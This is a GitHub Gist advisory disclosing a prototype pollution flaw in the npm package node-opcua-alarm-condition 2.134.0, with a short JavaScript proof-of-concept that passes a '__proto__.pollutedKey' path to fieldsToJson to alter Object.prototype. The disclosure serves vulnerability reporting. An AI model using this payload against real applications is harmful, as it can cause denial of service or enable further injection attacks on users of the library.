Skip to content

Instantly share code, notes, and snippets.

@tariqhawis
Created November 19, 2024 22:22
Show Gist options
  • Save tariqhawis/30acc3632cf595ca5825b7ec2b2f795a to your computer and use it in GitHub Desktop.
Save tariqhawis/30acc3632cf595ca5825b7ec2b2f795a to your computer and use it in GitHub Desktop.
Advisory for node-opcua-alarm-condition

Vulnerability type: Prototype Pollution

Affected Package:

  • Product: node-opcua-alarm-condition
  • Version: 2.134.0

Vulnerability Location(s):

setProperty (node_modules/node-opcua-alarm-condition/dist/event_stuff.js:36)
Object.fieldsToJson (node_modules/node-opcua-alarm-condition/dist/event_stuff.js:43)

Description:

The latest version of node-opcua-alarm-condition (2.134.0) is vulnerable to Prototype Pollution through the entry function(s) fieldsToJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

(async () => {
const lib = await import('node-opcua-alarm-condition');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for multiple functions, uncomment only one for each execution.
lib.fieldsToJson (["__proto__.pollutedKey"], ["pollutedValue"])
} catch (e) { }
console.log("After Attack: ", JSON.stringify({}.__proto__));
delete Object.prototype.pollutedKey;
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment